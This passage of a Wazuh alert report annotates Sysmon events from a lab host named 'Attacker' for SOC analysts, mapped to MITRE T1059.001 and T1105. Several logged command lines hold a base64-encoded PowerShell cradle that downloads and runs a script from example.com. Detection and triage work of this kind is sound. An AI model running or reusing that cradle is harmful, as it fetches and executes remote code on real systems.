data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:36.8501371Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285382
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:36.811 ProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00} ProcessId: 9052 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_bh44e1ed.2pr.ps1 CreationUtcTime: 2025-04-24 22:39:36.811 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:36.811
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bda6-680a-ab0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_bh44e1ed.2pr.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:36.811
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:45.976+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:45.976+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  92
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534385.1881516
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:43.3397900Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285441
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:40.470 ProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00} ProcessId: 4284 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bda6-680a-ab0b-000000000e00} ParentProcessId: 9052 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:40.470
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdac-680a-ad0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bda6-680a-ab0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:45.983+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:45.983+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  96
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534385.1889579
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:43.5281312Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285444
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:43.503 ProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00} ProcessId: 4284 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_dufuzwko.3br.ps1 CreationUtcTime: 2025-04-24 22:39:43.500 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:43.503
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdac-680a-ad0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_dufuzwko.3br.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:43.500
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:48.472+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:48.472+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  93
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534388.1892344
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:45.8395470Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285469
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:44.666 ProcessGuid: {94294ddc-bdb0-680a-b00b-000000000e00} ProcessId: 4736 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdac-680a-ad0b-000000000e00} ParentProcessId: 4284 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:44.666
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdb0-680a-b00b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4736
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdac-680a-ad0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  4284
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:48.488+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:48.488+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  97
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534388.1900407
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
